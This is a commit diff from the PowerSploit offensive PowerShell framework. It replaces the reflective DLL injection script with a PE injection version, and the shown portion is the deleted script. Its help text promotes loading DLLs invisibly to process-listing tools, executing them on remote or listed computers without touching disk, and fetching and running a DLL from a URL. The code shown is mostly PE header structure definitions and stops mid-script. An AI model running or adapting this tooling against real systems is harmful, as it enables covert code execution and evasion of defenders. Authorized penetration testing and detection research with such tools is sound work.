diff options
| author | Matt Graeber <mattgraeber@gmail.com> | 2013-05-31 19:35:26 -0400 |
|---|---|---|
| committer | Matt Graeber <mattgraeber@gmail.com> | 2013-05-31 19:35:26 -0400 |
| commit | dfec277813bfbc956dcac45345a9158093d68343 (patch) | |
| tree | f205c4c4d6e81f33ace8086bbf63881ffc12dd51 /CodeExecution | |
| parent | 6e5338c8a34ade0ec0a4704031109fb5187620f8 (diff) | |
| download | PowerSploit-dfec277813bfbc956dcac45345a9158093d68343.tar.gz PowerSploit-dfec277813bfbc956dcac45345a9158093d68343.zip | |
Added Invoke-ReflectivePEInjection
Another awesome addition from Joe Bialek. Invoke-ReflectivePEInjection
is a vast improvement over Invoke-ReflectiveDllInjection. It adds the
following features:
* Now supports loading exe files in memory
* Supports reflective dll injection into a remote process
* Additional sample Visual Studio solutions
Diffstat (limited to 'CodeExecution')
55 files changed, 4244 insertions, 1549 deletions
diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1 index c6c87f7..394c7de 100644 --- a/CodeExecution/CodeExecution.psd1 +++ b/CodeExecution/CodeExecution.psd1 @@ -74,7 +74,7 @@ ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = # List of all files packaged with this module FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', - 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectiveDllInjection.ps1', 'Watch-BlueScreen.ps1', 'Usage.md' + 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Watch-BlueScreen.ps1', 'Usage.md' # Private data to pass to the module specified in RootModule/ModuleToProcess # PrivateData = '' diff --git a/CodeExecution/DemoReflectiveDLL/DemoDLL.v11.suo b/CodeExecution/DemoReflectiveDLL/DemoDLL.v11.suo Binary files differdeleted file mode 100644 index f1bd5a6..0000000 --- a/CodeExecution/DemoReflectiveDLL/DemoDLL.v11.suo +++ /dev/null diff --git a/CodeExecution/DemoReflectiveDLL/DemoDLL/DemoDLL.vcxproj.user b/CodeExecution/DemoReflectiveDLL/DemoDLL/DemoDLL.vcxproj.user deleted file mode 100644 index ace9a86..0000000 --- a/CodeExecution/DemoReflectiveDLL/DemoDLL/DemoDLL.vcxproj.user +++ /dev/null @@ -1,3 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?> -<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> -</Project>
\ No newline at end of file diff --git a/CodeExecution/Invoke-ReflectiveDllInjection.ps1 b/CodeExecution/Invoke-ReflectiveDllInjection.ps1 deleted file mode 100644 index 72d0ee5..0000000 --- a/CodeExecution/Invoke-ReflectiveDllInjection.ps1 +++ /dev/null @@ -1,1545 +0,0 @@ -Function Invoke-ReflectiveDllInjection -{ -<# -.SYNOPSIS - -Reflectively loads a DLL in to memory of the Powershell process. -Because the DLL is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. - -This tool can be run on remote servers by supplying a local DLL to load in to memory on the remote system, -this will load and execute the DLL in to memory without writing any files to disk. - -PowerSploit Function: Invoke-ReflectiveDllInjection -Author: Joe Bialek, Twitter: @JosephBialek -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None - -.DESCRIPTION - -Reflectively loads a DLL in to the powershell process. - -.PARAMETER DllPath - -The path of the DLL to load and execute a function from. - -.PARAMETER DllUrl - -A URL to download the DLL from - -.PARAMETER ComputerName - -Optional, an array of computernames to run the script on - -.PARAMETER FuncReturnType - -Optional, the return type of the function being called in the DLL. Default: Void - Options: String, WString, Void. See notes for more information. - -.EXAMPLE - -Load DemoDLL from a URL and run the exported function WStringFunc on the current system, print the wchar_t* returned by WStringFunc(). -Note that the file name on the website can be any file extension. -Invoke-ReflectiveDllInjection -DllUrl http://yoursite.com/DemoDLL.dll -FuncReturnType WString - -.EXAMPLE - -Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc(). -Invoke-ReflectiveDllInjection -DllPath DemoDLL.dll -FuncReturnType WString -ComputerName Target.local - -.EXAMPLE - -Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print - the wchar_t* returned by WStringFunc() from all the computers. -Invoke-ReflectiveDllInjection -DllPath DemoDLL.dll -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) - -.NOTES - -Once this script loads the DLL, it calls a function in the DLL. There is a section near the bottom labeled "YOUR CODE GOES HERE" -I recommend your DLL take no parameters. I have prewritten code to handle functions which take no parameters are return -the following types: char*, wchar_t*, and void. If the function returns char* or wchar_t* the script will output the -returned data. The FuncReturnType parameter can be used to specify which return type to use. The mapping is as follows: -wchar_t* : FuncReturnType = WString -char* : FuncReturnType = String -void : Default, don't supply a FuncReturnType - -For the whcar_t* and char_t* options to work, you must allocate the string to the heap. Don't simply convert a string -using string.c_str() because it will be allocaed on the stack and be destroyed when the DLL returns. - -The function name expected in the DLL for the prewritten FuncReturnType's is as follows: -WString : WStringFunc -String : StringFunc -Void : VoidFunc - -These function names ARE case sensitive. To create an exported DLL function for the wstring type, the function would -be declared as follows: -extern "C" __declspec( dllexport ) wchar_t* WStringFunc() - - -If you want to use a DLL which returns a different data type, or which takes parameters, you will need to modify -this script to accomodate this. You can find the code to modify in the section labeled "YOUR CODE GOES HERE". - -Find a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection - -.LINK - -http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ -https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection - -#> - -[CmdletBinding(DefaultParameterSetName="WebFile")] -Param( - [Parameter(ParameterSetName = "LocalFile", Position = 0, Mandatory = $true)] - [String] - $DllPath, - - [Parameter(ParameterSetName = "WebFile", Position = 0, Mandatory = $true)] - [Uri] - $DllUrl, - - [Parameter(Position = 1)] - [String[]] - $ComputerName, - - [Parameter(Position = 2)] - [ValidateSet( 'WString', 'String', 'Void' )] - [String] - $FuncReturnType = 'Void' -) - -Set-StrictMode -Version 2 - -$RemoteScriptBlock = { - [CmdletBinding()] - Param( - [Parameter(Position = 0, Mandatory = $true)] - [Byte[]] - $DllBytes, - - [Parameter(Position = 1, Mandatory = $false)] - [String] - $FuncReturnType - ) - - ################################### - ########## Win32 Stuff ########## - ################################### - Function Get-Win32Types - { - $Win32Types = New-Object System.Object - - #Define all the structures/enums that will be used - # This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html - $Domain = [AppDomain]::CurrentDomain - $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly') - $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false) - $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] - - - ############ ENUM ############ - #Enum MachineType - $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16]) - $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null - $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null - $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null - $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null - $MachineType = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType - - #Enum MagicType - $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16]) - $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null - $MagicType = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType - - #Enum SubSystemType - $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16]) - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null - $SubSystemType = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType - - #Enum DllCharacteristicsType - $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16]) - $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null - $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null - $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null - $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null - $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null - $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null - $DllCharacteristicsType = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType - - ########### STRUCT ########### - #Struct IMAGE_DATA_DIRECTORY - $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8) - ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null - ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null - $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY - - #Struct IMAGE_FILE_HEADER - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20) - $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null - $IMAGE_FILE_HEADER = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER - - #Struct IMAGE_OPTIONAL_HEADER64 - $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240) - ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null - ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null - ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null - ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null - ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null - ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null - ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null - ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null - ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null - ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null - ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null - ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null - ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null - ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null - ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null - ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null - ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null - ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null - ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null - ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null - ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null - ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null - ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null - ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null - ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null - ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null - ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null - ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null - ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null - ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null - ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null - ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null - ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null - ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null - ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null - ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null - ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null - ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null - ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null - ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null - ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null - ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null - ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null - ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null - ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null - $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64 - - #Struct IMAGE_OPTIONAL_HEADER32 - $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224) - ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null - ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null - ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null - ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null - ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null - ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null - ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null - ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null - ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null - ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null - ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null - ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null - ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null - ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null - ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null - ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null - ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null - ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null - ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null - ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null - ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null - ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null - ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null - ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null - ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null - ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null - ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null - ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null - ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null - ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null - ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null - ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null - ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null - ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null - ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null - ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null - ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null - ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null - ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null - ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null - ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null - ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null - ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null - ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null - ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null - ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null - $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32 - - #Struct IMAGE_NT_HEADERS64 - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264) - $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null - $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null - $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64 - - #Struct IMAGE_NT_HEADERS32 - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248) - $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null - $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null - $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32 - - #Struct IMAGE_DOS_HEADER - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64) - $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null - - $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal') - $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray - $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst')) - $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4)) - $e_resField.SetCustomAttribute($AttribBuilder) - - $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null - - $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal') - $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray - $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10)) - $e_res2Field.SetCustomAttribute($AttribBuilder) - - $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null - $IMAGE_DOS_HEADER = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER - - #Struct IMAGE_SECTION_HEADER - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40) - - $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal') - $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray - $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8)) - $nameField.SetCustomAttribute($AttribBuilder) - - $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null - $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER - - #Struct IMAGE_BASE_RELOCATION - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - 